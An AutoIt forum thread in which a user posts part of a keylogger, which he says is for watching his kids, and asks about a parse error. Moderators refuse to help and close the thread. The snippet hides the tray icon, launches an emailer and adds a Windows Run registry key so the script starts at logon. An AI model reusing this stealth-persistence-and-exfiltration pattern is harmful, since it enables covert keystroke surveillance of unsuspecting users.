Jump to content

keylogger script need help


sumkid
 Share

Recommended Posts

ok so i made myself a keylogger for the purpose of watching what my kids do on the computer. i have this part of the source code

#include <Misc.au3>
#NoTrayIcon

$omfg = @ScriptDir
$ROFL = @ScriptName
run( "background.EXE", $omfg )

RegWrite( "HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "Sx_erud","REG_SZ", $omfg & $ROFL )

when i run it i get an error saying "Error parsing function call" anyone that can tell me what that means?

PS: i hid the rest of the code for the sake of the community

PPS: background.exe is the emailer

Edited by sumkid
Link to comment
Share on other sites

  • Moderators

anyone, help?

Regardless of your intentions, you won't get help on key loggers here. If you want to make one, then the only help you'll get is with the search function.

Common sense plays a role in the basics of understanding AutoIt... If you're lacking in that, do us all a favor, and step away from the computer.

Link to comment
Share on other sites

because not all people make key loggers to do good things. And the bad programs get autoit black listed by anti virus programs. You could have simply asked help with that part of your code. Or see if others have made them, and pmed them. I also find it kinda funny that "sumkid" has kids.

Link to comment
Share on other sites

  • Moderators

why would i not get help? its for my use only and i didnt post the source. i just dont understand what it means "Error parsing function call"

You probably tried to use more (or less) parameters than allowed.

Common sense plays a role in the basics of understanding AutoIt... If you're lacking in that, do us all a favor, and step away from the computer.

Link to comment
Share on other sites

ok so i made myself a keylogger for the purpose of watching what my kids do on the computer. i have this part of the source code

This may sound harsh, but have you tried watching your child or spending quality time and educating them instead of spying on them?

Agreement is not necessary - thinking for one's self is!

My-Colors.jpg

cuniform2.gif

Link to comment
Share on other sites

Guest
This topic is now closed to further replies.
 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...